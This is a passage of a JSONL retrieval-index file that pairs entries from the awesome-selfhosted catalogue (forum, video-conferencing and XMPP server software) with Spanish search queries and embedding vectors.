-0.07257, 0.02271, -0.02515, 0.02784, -0.01637, 0.01907, -0.0573, 0.00382, 0.02454, -0.07333, -0.03312, 0.02152, 0.03611, -0.08012, -0.00728, -0.05893, 0.00621, 0.00026, 0.019, 0.00796, -0.01201, -0.00637, 0.00368, -0.03108, 0.01294, 0.11236, -0.05967, 0.01082, -0.00018, 0.03899, 0.05652, 0.00436, -0.0594, -0.00185, 0.05026, 0.00523, 0.03336, -0.03228, 0.00664, -0.05129, -0.01433, 0.00803, 0.03053, 0.01081, -0.00011, -0.00773, 0.05512, -0.02445, -0.03103, 0.01102, 0.02301, 0.00258, 0.02569, -0.01179, -0.0453, -0.09311, 0.0069, -0.01338, -0.08535, 0.00712, -0.00852, 0.02527, -0.03916, 0.06241, -0.01577]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: remark42 β€” Lightweight and simple comment engine, which doesn't spy on users. It can be embedded into blogs, articles or any other place where readers add comments [MIT, Docker/Go]. Scoold β€” Stack Overflow in a JAR. An enterprise-ready Q&A platform with full-text search, SAML, LDAP integration and social login support [Apache-2.0, Java/Docker/K8S]. Simple Machines Forum β€” Free, professional grade software package that allows you to set up your own online community within minutes [BSD-3-Clause, PHP]. Socialhome β€” Federated and decentralized profile builder and social network engine [AGPL-3.0, Docker/Python]. Talkyard β€” Create a community, where your users can suggest ideas and get questions answered. And have friendly open-ended discussions and chat (Slack/StackOverflow/Discourse/Reddit/Disqus hybrid) [AGPL-3.0, Docker/Scala]. yarn.social β€” Self-Hosted, Twitterβ„’-like Decentralised micro-logging platform. No ads, no tracking, your content, your data [MIT, Go].", "indexar": "con que herramienta puedo montar un sistema de preguntas y respuestas estilo Stack Overflow en mi empresa?", "v": [-0.02691, 0.15455, -0.15909, -0.1917, -0.06178, -0.13271, -0.10003, -0.07143, -0.0609, -0.08925, -0.11164, -0.04792, 0.03373, -0.06613, 0.0627, 0.08908, 0.08183, -0.11269, -0.06119, 0.01088, -0.06847, -0.11857, -0.16997, -0.05444, -0.08983, 0.09316, 0.00913, -0.15479, -0.22185, 0.0546, 0.07993, 0.07172, 0.00273, -0.02228, -0.06649, -0.14465, 0.02991, 0.02646, 0.08957, 0.06727, -0.12616, -0.08798, 0.07343, -0.01041, 0.0658, 0.03609, -0.01805, -0.09488, -0.01265, 0.09468, -0.0323, -0.159, -0.08837, 0.01792, -0.08382, -0.0681, 0.12925, -0.0567, 0.0891, -0.03508, -0.03236, 0.03562, -0.06972, 0.03164, 0.03323, -0.04976, -0.00047, -0.07316, -0.05854, 0.02084, -0.05664, -0.06885, -0.0502, -0.0488, 0.04173, 0.06961, 0.0755, 0.02158, 0.04778, 0.08694, 0.02052, -0.01808, -0.08709, 0.02876, -0.05249, -0.02408, -0.01266, -0.04159, -0.05741, 0.02157, -0.06002, -0.02432, 0.05788, 0.05027, -0.0851, -0.11506, 0.04777, 0.06945, -0.02256, -0.0089, 0.01858, -0.01838, -0.0545, 0.08725, -0.0868, -0.01926, -0.02674, -0.12891, -0.01535, -0.03625, 0.00761, 0.02423, -0.01755, -0.05632, -0.03233, -0.01763, -0.00265, 0.0304, -0.08473, 0.08275, -0.0213, 0.05523, 0.02613, -0.06781, 0.05058, -0.10331, 0.06922, 0.07135, -0.00102, -0.06009, 0.03782, -0.02577, -0.1046, 0.01985, 0.04161, -0.0666, 0.00294, 0.02772, 0.0811, -0.1037, -0.00294, 0.01248, -0.0072, -0.05202, 0.04538, 0.01982, 0.02807, -0.1755, -0.04983, -0.00416, -0.01232, 0.07228, 0.04119, 0.01578, -0.05823, -0.00385, 0.0641, -0.03056, 0.02104, 0.07619, 0.02624, -0.00868, 0.03593, 0.04822, -0.03304, -0.03655, -0.02273, -0.03019, 0.01052, -0.01542, -0.00378, 0.02574, 0.07053, -0.03936, 0.00833, -0.005, -0.05472, -0.11026, 0.04166, -0.03824, -0.07716, 0.08892, -0.0209, 0.02615, 0.03234, -0.07839, 0.11047, -0.01784, 0.01446, 0.04235, 0.02402, 0.00067, 0.06069, -0.06639, 0.01306, 0.04257, 0.00087, -0.03408, -0.00483, 0.02271, -0.03715, 0.03512, -0.07431, -0.03429, -0.0109, 0.10076, 0.03529, 0.05426, 0.04553, 0.02574, 0.03247, 0.0175, 0.08503, -0.0439, -0.04413, -0.0206, -0.00631, -0.00089, -0.01195, 0.01998, 0.02801, -0.00318, 0.07436, 0.00205, -0.02702, -0.00082, 0.01902, -0.00779, -0.0625, -0.00269, 0.03144, -0.04003, -0.02282, -0.03995, 0.00807, -0.03191, 0.02571, -0.04306, -0.03074, -0.02891, 0.08661, 0.06253, -0.00969, 0.01093, -0.05426, -0.05246, -0.00346, -0.00886, -0.05615, -0.10338, -0.03472, -0.01109, -0.00652, -0.04954, 0.01877, -0.00121]} -{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: BigBlueButton β€” Supports real-time sharing of audio, video, slides (with whiteboard controls), chat, and the screen. Instructors can engage remote students with polling, emojis, and breakout rooms [LGPL-3.0, Java]. Galene β€” Video conferencing server that is easy to deploy and that requires moderate server resources [MIT, Go]. Janus β€” General-purpose, lightweight, minimalist WebRTC Server [GPL-3.0, C]. Jitsi Meet β€” WebRTC application that uses Jitsi Videobridge to provide high quality, scalable video conferences [Apache-2.0, Nodejs/Docker/deb]. Jitsi Video Bridge β€” WebRTC compatible Selective Forwarding Unit (SFU) that allows for multiuser video communication [Apache-2.0, Java/deb]. MiroTalk C2C β€” Real-time cam-2-cam video calls & screen sharing, end-to-end encrypted, to embed in any website with a simple iframe [AGPL-3.0, Nodejs/Docker]. MiroTalk P2P β€” Simple, secure, fast real-time video conferences up to 4k and 60fps, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker].", "indexar": "ΒΏcon quΓ© puedo montar una videollamada en tiempo real que soporte compartir pantalla y pizarra?", "v": [0.04671, 0.07034, -0.2526, -0.02704, -0.11709, -0.06237, 0.02186, -0.10874, -0.03541, -0.19808, 0.085, -0.10018, 0.09182, -0.01357, 0.03587, 0.08305, 0.07555, -0.01714, 0.07628, -0.12303, 0.06848, -0.06925, -0.11872, -0.12419, 0.0148, 0.01314, 0.0815, -0.01521, -0.08961, -0.09547, 0.02692, 0.0591, 0.05874, 0.04306, -0.06665, -0.06557, 0.06605, -0.0185, -0.03543, -0.01604, -0.05048, 0.10739, 0.0867, -0.06935, 0.01513, -0.05979, 0.03699, 0.00227, -0.12031, 0.05632, -0.0541, -0.00043, -0.00298, 0.02097, -0.11157, -0.18509, 0.26061, -0.09959, 0.13576, -0.02292, -0.01197, -0.02831, -0.02207, 0.04246, -0.05259, 0.00933, -0.0387, 0.04748, -0.11191, 0.00597, -0.15814, -0.04371, 0.06142, -0.01542, -0.02782, 0.01937, -0.07941, -0.01264, -0.02714, -0.01923, 0.03418, -0.00107, 0.03493, 0.10959, -0.06046, -0.01612, -0.05491, -0.11673, -0.04734, -0.07786, 0.02338, 0.13836, 0.03115, 0.00025, -0.01291, -0.07528, 0.04392, -0.00935, -0.00932, 0.00231, 0.01034, -0.07802, -0.10982, 0.0314, 0.04158, 0.11153, 0.04448, -0.13226, -0.01857, -0.09418, 0.04398, 0.05712, -0.13009, 0.02986, -0.03189, -0.04044, -0.01733, 0.00469, -0.05605, 0.00171, 0.07007, 0.03479, 0.03176, -0.01697, 0.05945, 0.03051, 0.0242, 0.07873, -0.09617, 0.03594, -0.02018, -0.05239, -0.0035, -0.04388, 0.00725, -0.00807, 0.03099, 0.05935, 0.00864, -0.08368, 0.1372, 0.01236, -0.04155, -0.10275, 0.05145, -0.00667, 0.05425, -0.08691, -0.0705, 0.04202, 0.0767, 0.05885, 0.02233, -0.02678, 0.02275, -0.00286, 0.06829, 0.00275, -0.03101, 0.03945, 0.05211, 0.00775, -0.06725, -0.05344, -0.04167, -0.02061, -0.06071, 0.01561, 0.04625, 0.05527, 0.01173, 0.05294, 0.04228, -0.0352, -0.01845, -0.01127, 0.03191, -0.00502, -0.00474, -0.10069, -0.02389, 0.03485, 0.04189, 0.06854, 0.02871, -0.01524, 0.00607, -0.0152, -0.037, 0.03819, 0.04416, -0.04639, -0.01496, 0.04265, -0.00063, -0.10909, -0.033, -0.00877, 0.0399, -0.01314, -0.0164, -0.07107, 0.01854, 0.0088, -0.00724, -0.00655, -0.04492, 0.10851, 0.06358, 0.0068, 0.01041, 0.03355, 0.03515, -0.01671, -0.01982, -0.00304, 0.06926, 0.04371, -0.02934, -0.02832, 0.06022, 0.02666, 0.06951, 0.00162, -0.00909, 0.06522, 0.04773, 0.04421, -0.05512, -0.02844, -0.0169, -0.01106, 0.01003, -0.02497, 0.0284, -0.00447, 0.00733, -0.01825, -0.05567, 0.0197, 0.01945, 0.04191, -0.0147, -0.01856, -0.04055, -0.04311, -0.1083, 0.03704, 0.02921, -0.1039, -0.03861, 0.01411, 0.0141, 0.02557, -0.06073, 0.008]} -{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: BigBlueButton β€” Supports real-time sharing of audio, video, slides (with whiteboard controls), chat, and the screen. Instructors can engage remote students with polling, emojis, and breakout rooms [LGPL-3.0, Java]. Galene β€” Video conferencing server that is easy to deploy and that requires moderate server resources [MIT, Go]. Janus β€” General-purpose, lightweight, minimalist WebRTC Server [GPL-3.0, C]. Jitsi Meet β€” WebRTC application that uses Jitsi Videobridge to provide high quality, scalable video conferences [Apache-2.0, Nodejs/Docker/deb]. Jitsi Video Bridge β€” WebRTC compatible Selective Forwarding Unit (SFU) that allows for multiuser video communication [Apache-2.0, Java/deb]. MiroTalk C2C β€” Real-time cam-2-cam video calls & screen sharing, end-to-end encrypted, to embed in any website with a simple iframe [AGPL-3.0, Nodejs/Docker]. MiroTalk P2P β€” Simple, secure, fast real-time video conferences up to 4k and 60fps, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker].", "indexar": "que programa es para conferencias de video escalables y de alta calidad sin dependencias externas complejas", "v": [0.29502, 0.02657, -0.0552, -0.11184, 0.02719, -0.08843, 0.01761, -0.0466, -0.01066, -0.08458, -0.05361, 0.00078, -0.16719, -0.04353, 0.04295, 0.08758, -0.00558, -0.09851, 0.03911, 0.02227, 0.04887, -0.02227, -0.0324, 0.01383, -0.04574, 0.04149, 0.00871, -0.03736, -0.03954, -0.07352, 0.06099, 0.07494, -0.03695, -0.10073, 0.13853, 0.05577, -0.10369, 0.02785, -0.0422, -0.06022, -0.06448, 0.04145, -0.04489, -0.08926, 0.05773, -0.09779, -0.05533, 0.13771, -0.06887, -0.02749, -0.12143, 0.02794, 0.01451, 0.00629, 0.0003, -0.13301, 0.00353, -0.07009, -0.00977, 0.02291, 0.02758, -0.02579, 0.0376, -0.01317, 0.01151, -0.00294, 0.0116, 0.00366, -0.02521, -0.0054, -0.15403, -0.12525, 0.10248, 0.0261, -0.01782, 0.03759, -0.12365, -0.06274, -0.02007, 0.04774, 0.01942, -0.01044, 0.00415, 0.16896, -0.09551, -0.02251, 0.00442, -0.03263, 0.03738, 0.00404, 0.00774, 0.038, 0.04521, -0.04029, -0.00653, -0.09779, 0.08441, 0.11658, 0.09091, 0.07826, -0.00028, 0.04451, -0.0019, 0.10821, -0.0017, 0.15038, 0.07315, -0.12026, -0.0402, -0.00303, 0.02826, 0.08755, -0.06922, -0.07173, -0.12748, -0.05364, -0.04041, -0.04916, -0.03806, -0.02503, 0.00557, -0.01648, -0.03001, -0.0359, -0.00335, -0.04054, -0.13364, 0.06389, 0.0357, 0.0141, 0.00325, -0.03191, -0.02386, -0.07468, 0.12715, -0.0662, 0.06617, -0.02116, 0.01972, -0.13623, 0.07254, 0.07518, 0.08639, -0.05228, -0.00576, 0.02316, 0.0375, -0.0735, -0.03881, 0.07879, 0.01369, 0.08768, 0.01964, 0.03031, -0.034, -0.07483, -0.05444, -0.08061, -0.02212, 0.11751, -0.02378, -0.00859, 0.02107, -0.11146, 0.06338, 0.03292, -0.01214, 0.07299, 0.01833, 0.06341, -0.04464, 0.05276, 0.01319, -0.09067, -0.08898, -0.05817, 0.04268, -0.10218, -0.0209, -0.06118, -0.12718, 0.04651, -0.00361, 0.00274, 0.01149, -0.07017, -0.05163, 0.00648, -0.0142, -0.04541, 0.02387, 0.03457, -0.03876, -0.00496, -0.00717, -0.04877, -0.08903, -0.08135, 0.01641, -0.01599, -0.01982, -0.02706, -0.02659, -0.03287, 0.00544, 0.04679, -0.0107, 0.04407, 0.02265, 0.12031, 0.04536, 0.04116, 0.00663, -0.0749, 0.02512, -0.07627, -0.00101, 0.07286, 0.01424, 0.08621, 0.01599, -0.00181, 0.06452, -0.0008, 0.0207, 0.02185, 0.00134, 0.05861, -0.00656, -0.02531, -0.04987, 0.00905, -0.01365, -0.02147, 0.02641, 0.05825, 0.03546, 0.02047, 0.01191, -0.09873, -0.04525, 0.0338, -0.02974, -0.04869, -0.03123, -0.05186, -0.09822, 0.06352, 0.03146, -0.0371, -0.01742, 0.03328, 0.03029, 0.01492, 0.02163, -0.00469]} -{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: BigBlueButton β€” Supports real-time sharing of audio, video, slides (with whiteboard controls), chat, and the screen. Instructors can engage remote students with polling, emojis, and breakout rooms [LGPL-3.0, Java]. Galene β€” Video conferencing server that is easy to deploy and that requires moderate server resources [MIT, Go]. Janus β€” General-purpose, lightweight, minimalist WebRTC Server [GPL-3.0, C]. Jitsi Meet β€” WebRTC application that uses Jitsi Videobridge to provide high quality, scalable video conferences [Apache-2.0, Nodejs/Docker/deb]. Jitsi Video Bridge β€” WebRTC compatible Selective Forwarding Unit (SFU) that allows for multiuser video communication [Apache-2.0, Java/deb]. MiroTalk C2C β€” Real-time cam-2-cam video calls & screen sharing, end-to-end encrypted, to embed in any website with a simple iframe [AGPL-3.0, Nodejs/Docker]. MiroTalk P2P β€” Simple, secure, fast real-time video conferences up to 4k and 60fps, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker].", "indexar": "cual es una alternativa libre a Zoom para reuniones multipersona con salas de trabajo", "v": [0.0308, 0.08553, -0.10384, -0.05936, -0.13263, -0.13527, -0.03551, -0.10559, -0.11138, -0.10524, -0.15382, -0.15977, 0.09891, -0.00014, 0.06947, 0.0391, 0.11968, 0.00245, 0.00605, 0.00259, 0.03539, 0.02836, -0.11446, -0.02579, -0.03603, -0.12304, 0.09886, -0.08166, -0.04227, 0.06869, 0.05626, -0.04947, 0.0751, -0.0641, 0.11791, -0.01722, 0.02404, 0.04422, -0.0041, -0.07402, -0.11561, 0.07511, -0.13324, -0.01047, 0.03566, -0.01805, -0.11091, -0.01695, -0.09776, 0.07381, -0.15955, 0.07286, -0.02157, -0.04573, 0.05629, -0.0948, 0.06277, 0.02307, -0.11513, 0.00844, -0.0268, 0.03765, -0.02678, -0.05024, 0.03545, 0.10819, -0.02076, 0.0093, 0.003, 0.08954, -0.04459, -0.07612, 0.00127, -0.07694, -0.01698, -0.00579, -0.07428, 0.03413, -0.12611, 0.02308, 0.1306, -0.06368, -0.0487, 0.09543, -0.11786, -0.1562, 0.08763, -0.09797, -0.03764, 0.06609, 0.04455, 0.03204, -0.04161, -0.05432, 0.01166, -0.04079, 0.00104, 0.10322, -0.03636, 0.05836, 0.07489, 0.01202, -0.09948, 0.02102, -0.08159, 0.02448, -0.03834, 0.03891, -0.09453, -0.02033, -0.03476, 0.11589, -0.03054, 0.01224, -0.00045, -0.07168, 0.00161, 0.00051, 0.07464, -0.08711, -0.01838, 0.00808, -0.03078, -0.07331, -0.02398, -0.08901, 0.09538, 0.04284, 0.02574, 0.0614, 0.04712, -0.01846, -0.07007, -0.04491, -0.03683, 0.00039, 0.10194, -0.06568, 0.02085, -0.06655, 0.01721, -0.02184, 0.15957, -0.04673, 0.05917, -0.00785, 0.0046, 0.00692, -0.04935, -0.07809, -0.04618, 0.09127, 0.0702, 0.03825, -0.06488, 0.02482, -0.11602, 0.03176, -0.0288, 0.11285, 0.04744, -0.02577, -0.00491, 0.03848, 0.02291, -0.00806, -0.10498, -0.07892, -0.03632, 0.01304, 0.00741, 0.01374, 0.0529, -0.08778, -0.00433, 0.00122, 0.01022, -0.00317, 0.03533, -0.01436, 0.01069, 0.07977, -0.03767, -0.06741, 0.01801, -0.03694, 0.03686, 0.02477, 0.02165, 0.00321, -0.0342, 0.03083, -0.05161, -0.06841, 0.01858, -0.00591, 0.00585, -0.09086, 0.03814, -0.02765, -0.02194, -0.00826, -0.09117, -0.04537, 0.02372, 0.01588, -0.12088, 0.0047, -0.03191, 0.03375, 0.06212, 0.00457, 0.09391, 0.01379, -0.09699, 0.04059, 0.04433, -0.06129, 0.0149, -0.01623, 0.06131, 0.04292, 0.02216, -0.05396, 0.01, 0.0172, 0.06501, -0.01623, -0.00667, 0.03767, 0.03221, 0.04487, 0.01247, -0.01852, 0.04119, 0.05528, 0.01664, 0.05503, -0.00022, -0.04366, 0.03728, 0.03788, -0.04545, -0.02503, -0.05362, -0.00624, -0.11652, 0.0388, -0.03187, -0.08563, -0.05645, 0.04608, -0.01943, 0.01086, -0.00667, -0.04136]} -{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: MiroTalk SFU β€” Simple, secure, scalable real-time video conferences up to 4k, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker]. plugNmeet β€” Scalable and high performance web conferencing system [MIT, Docker/Go].", "indexar": "que programa de videoconferencia es seguro y funciona en todos los navegadores?", "v": [0.0558, -0.03125, -0.12641, -0.15634, 0.01474, -0.13839, 0.05977, -0.08611, 0.00605, -0.20418, -0.04414, -0.17201, -0.04377, -0.03709, -0.01738, 0.0476, 0.15438, -0.14806, 0.06851, 0.02032, 0.10358, -0.0494, -0.01555, -0.12749, -0.03359, 0.03731, -0.05965, 0.02866, -0.00046, -0.04955, 0.04762, -0.03364, 0.16895, -0.06864, -0.05168, 0.04678, 0.0695, -0.05867, 0.07735, 0.10906, -0.01879, 0.04126, -0.05195, -0.05593, -0.01482, 0.0285, 0.08729, -0.06744, -0.03838, -0.09014, -0.00163, 0.02071, -0.10203, -0.01514, -0.05402, -0.08819, 0.05963, -0.08949, -0.03942, 0.00689, 0.03808, -0.05231, 0.044, -0.02948, 0.03431, -0.07869, 0.12345, -0.00219, 0.01415, 0.05396, -0.0923, -0.00428, 0.03842, 0.0623, -0.04606, 0.04961, -0.03252, 0.04332, 0.00753, 0.0873, 0.03877, 0.08716, 0.01354, 0.03446, -0.0677, -0.03785, -0.0629, -0.00611, 0.03558, -0.0939, 0.03145, 0.15115, 0.10976, 0.03318, -0.00813, -0.08641, 0.13971, -0.00925, 0.00159, -0.00866, 0.08897, -0.02991, -0.02386, 0.12732, 0.05739, 0.07181, 0.1087, -0.02567, -0.10194, -0.04168, 0.03126, 0.00339, -0.13463, -0.06868, -0.03745, 0.08291, -0.08796, -0.04754, 0.07463, -0.09082, -0.0974, 0.06916, -0.12783, -0.05225, 0.09278, 0.08109, -0.02685, 0.07425, -0.11708, 0.09265, 0.05646, -0.07877, -0.09766, -0.00891, 0.02357, -0.05581, 0.00316, -0.03589, 0.00013, -0.00743, 0.11058, 0.02794, 0.00723, -0.01464, 0.0853, -0.02892, 0.05375, -0.04413, -0.04218, -0.00565, 0.04631, 0.04461, -0.07874, -0.033, -0.01044, 0.02665, -0.00971, -0.02329, -0.05898, 0.05917, 0.02334, 0.03829, 0.075, -0.01048, 0.03211, -0.02099, -0.0562, -0.01155, 0.09069, 0.05815, 0.05621, 0.08675, 0.10176, -0.11701, -0.03956, -0.03879, -0.01982, -0.01658, 0.04375, -0.04774, -0.02911, 0.04266, 0.07713, 0.02071, -0.02862, -0.07731, -0.01411, 0.03148, -0.09139, 0.01546, 0.02923, -0.04006, -0.09989, 0.03393, 0.00632, -0.06451, -0.04044, -0.06695, 0.01788, 0.03479, -0.00323, -0.0492, 0.05861, -0.01166, -0.00395, 0.05288, 0.01482, 0.00314, 0.06253, 0.09028, -0.01895, -0.00873, 0.01386, 0.05615, 0.03301, -0.0285, 0.05496, 0.10431, 0.01629, -0.00253, -0.00665, -0.06055, -0.04024, 0.03866, -0.01422, -0.00574, 0.04208, 0.01077, -0.03604, -0.02715, 0.01158, -0.05287, -0.03756, -0.02474, 0.03316, 0.00973, -0.03818, 0.01159, -0.04764, -0.01202, -0.06601, 0.03426, 0.04848, -0.0041, -0.02814, -0.01166, -0.07244, -0.03636, 0.01215, 0.01819, -0.04028, 0.01962, -0.01118, 0.02184, 0.02095, 0.06233]} -{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: MiroTalk SFU β€” Simple, secure, scalable real-time video conferences up to 4k, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker]. plugNmeet β€” Scalable and high performance web conferencing system [MIT, Docker/Go].", "indexar": "cual puedo usar para reuniones virtuales escalables sin pagar licencias?", "v": [0.08053, 0.02265, -0.23201, -0.10789, -0.01466, -0.11759, -0.03606, -0.14239, -0.03601, -0.21209, -0.02958, -0.2078, 0.02767, -0.00852, 0.10771, 0.06403, 0.01927, -0.07105, 0.07121, -0.01366, 0.07243, -0.00746, -0.11436, 0.01611, -0.06238, 0.10718, 0.05121, -0.16039, -0.08078, 0.01134, 0.05534, 0.05246, 0.05661, -0.06692, 0.046, 0.01145, -0.00745, 0.11674, 0.09153, -0.06523, 0.06209, 0.12288, -0.10557, -0.11579, 0.01837, -0.1076, -0.03516, 0.06715, -0.11349, -0.07617, -0.07804, 0.01372, -0.10818, -0.09539, 0.05419, -0.0944, 0.19706, -0.06452, 0.06845, -0.03404, -0.12545, -0.06866, 0.06179, 0.03629, -0.00745, 0.02134, 0.0535, 0.06617, -0.08509, 0.0105, -0.15366, 0.00932, 0.09366, 0.00638, 0.02587, -0.02381, -0.04846, -0.07892, 0.01834, 0.13087, 0.06995, -0.04582, -0.04456, 0.02316, -0.03386, -0.07627, 0.0379, -0.06752, 0.09825, 0.08145, 0.02825, 0.06964, -0.05287, -0.044, 0.06759, -0.08212, 0.03938, 0.09157, -0.05762, 0.046, -0.07682, 0.08408, -0.04852, 0.02333, -0.05978, 0.06353, 0.04761, -0.06583, -0.02244, -0.04163, 0.03751, 0.11795, -0.09332, 0.024, 0.03029, 0.00171, 0.03129, -0.02106, 0.05874, -0.01702, 0.03511, -0.00644, 0.04039, -0.02965, 0.06024, 0.02099, 0.00161, 0.14623, -0.0652, -0.00802, -0.02484, -0.06066, 0.00177, -0.02878, -0.02685, 0.01814, 0.05452, -0.04924, -0.03074, -0.05091, 0.04938, 0.05388, 0.00987, -0.00865, 0.05676, 0.07084, -0.07565, -0.06476, -0.09608, 0.02102, 0.10135, 0.03603, -0.02202, 0.08327, -0.03855, 0.00222, -0.09561, -0.04135, -0.02722, 0.03484, 0.0208, 0.063, 0.01757, 0.00549, -0.00208, -0.00889, -0.04372, 0.03634, 0.00011, 0.05351, 0.0195, -0.02791, -0.01198, 0.01583, 0.04992, 0.03894, -0.02122, -0.0288, -0.01629, -0.02342, -0.04386, 0.0417, -0.04519, -0.05767, 0.01202, 0.06562, -0.00104, 0.05431, 0.0105, 0.03959, -0.0728, 0.03369, 0.01575, -0.03917, 0.04756, -0.04906, -0.00546, -0.00265, -0.00186, -0.0721, -0.0081, -0.01776, -0.12631, -0.0136, 0.08117, -0.05174, -0.04181, 0.05501, 0.00636, 0.05345, -0.01409, -0.03906, 0.01183, -0.02001, -0.04087, 0.03126, -0.02142, -0.03939, -0.05611, -0.01314, 0.05198, -0.00182, 0.01112, 0.03069, 0.06753, 0.04727, 0.0111, 0.02303, -0.00872, -0.02321, -0.01792, 0.05426, -0.01063, -0.0187, 0.00235, 0.028, 0.03553, 0.04955, -0.01119, 0.00229, -0.02939, 0.05234, 0.00963, 0.02632, -0.02644, -0.03373, -0.09125, -0.00449, -0.02586, -0.04045, 0.00158, 0.05024, 0.04411, 0.02555, -0.01745, 0.00746]} -{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: MiroTalk SFU β€” Simple, secure, scalable real-time video conferences up to 4k, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker]. plugNmeet β€” Scalable and high performance web conferencing system [MIT, Docker/Go].", "indexar": "hay alguna alternativa libre a las soluciones de videollamadas profesionales?", "v": [0.0766, 0.05011, -0.19207, 0.01316, -0.16576, -0.05227, 0.02711, -0.13948, -0.11681, -0.1586, 0.07503, -0.27901, 0.05065, -0.04536, 0.14606, 0.01791, 0.0706, -0.11095, 0.11279, -0.1014, -0.01855, -0.04963, -0.12214, -0.09932, -0.02212, -0.06537, 0.01891, -0.01428, -0.01382, -0.0508, 0.0164, 0.04415, 0.0121, 0.00904, -0.04606, 0.08031, 0.00634, -0.0013, 0.0145, 0.0297, -0.00832, -0.0087, 0.02508, -0.05806, 0.02445, -0.08957, -0.08565, -0.033, -0.11682, 0.05132, -0.05557, -0.02077, 0.00431, -0.03419, 0.04951, -0.15099, 0.12915, -0.02641, -0.07251, -0.10555, -0.01336, 0.03565, 0.0477, 0.02423, 0.04503, 0.06973, -0.00384, -0.00519, -0.0015, 0.01333, -0.12252, -0.03776, 0.04363, -0.07296, -0.08327, 0.00988, -0.13751, 0.04111, -0.07244, 0.08104, 0.0457, -0.07853, 0.03944, -0.02711, -0.08725, -0.00764, -0.0158, -0.07682, -0.00713, -0.05974, 0.08626, 0.07088, 0.05484, 0.0586, -0.03118, -0.07052, 0.07075, 0.04939, 0.01102, 0.04672, 0.13788, 0.00146, -0.09866, 0.01146, 0.01711, 0.03982, 0.01815, -0.00195, -0.05619, -0.02583, -0.01075, 0.11805, 0.07116, -0.02068, -0.1156, -0.0304, -0.03678, 0.0458, -0.02533, 0.01752, 0.07005, -0.08071, 0.01786, -0.07908, -0.01401, 0.03566, -0.00502, 0.08897, -0.10492, 0.06752, 0.05811, -0.08972, -0.10871, -0.04749, -0.01759, 0.00259, 0.12363, 0.01358, -0.00892, -0.00612, 0.03773, 0.01192, -0.00389, -0.04666, 0.08874, -0.06028, 0.01136, -0.08101, -0.02514, -0.00938, 0.03462, 0.03094, -0.03349, 0.0479, -0.01078, 0.1109, -0.00405, -0.03633, -0.06144, 0.07411, 0.04168, -0.01151, -0.02124, 0.01909, -0.06677, 0.04297, 0.02053, 0.03427, -0.10139, 0.03646, 0.05473, 0.01789, -0.00719, -0.09313, 0.03398, 0.04127, 0.01634, -0.09455, 0.07836, -0.05994, 0.01422, 0.01196, -0.06292, 0.00049, 0.02344, -0.04523, 0.056, -0.02736, -0.04011, 0.05457, -0.02327, -0.09723, -0.08433, -0.08008, -0.00777, -0.08383, -0.028, -0.10915, -0.07641, -0.01135, -0.085, -0.03447, -0.00607, -0.01774, -0.05787, -0.01204, -0.05116, 0.04198, 0.06066, 0.01459, 0.02122, -0.03375, 0.04628, 0.00501, 0.04103, -0.00848, 0.06935, 0.04571, -0.04669, 0.01214, 0.04406, 0.00901, 0.01633, 0.02607, -0.03319, 0.08421, 0.04871, 0.03585, -0.06825, -0.02784, 0.00945, -0.042, -0.01009, -0.00549, 0.0256, 0.02855, -0.01961, -0.02615, -0.0363, 0.02057, 0.07162, 0.04195, -0.03804, 0.02182, -0.0264, -0.03816, -0.06441, -0.00707, 0.07886, -0.07766, -0.00704, 0.04724, -0.00962, 0.07332, -0.03902, 0.03476]} -{"tipo": "pregunta", "herramienta": "Communication - XMPP - Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Servers", "tema": "communication - xmpp - servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Servers: ejabberd β€” XMPP instant messaging server [GPL-2.0, Erlang/Docker]. MongooseIM β€” Mobile messaging platform with a focus on performance and scalability [GPL-2.0, Erlang/Docker/K8S]. Openfire β€” Real time collaboration (RTC) server [Apache-2.0, Java]. Prosody IM β€” Feature-rich and easy to configure XMPP server [MIT, Lua]. Snikket β€” All-in-one Dockerized easy XMPP solution, including web admin and clients [Apache-2.0, Docker]. 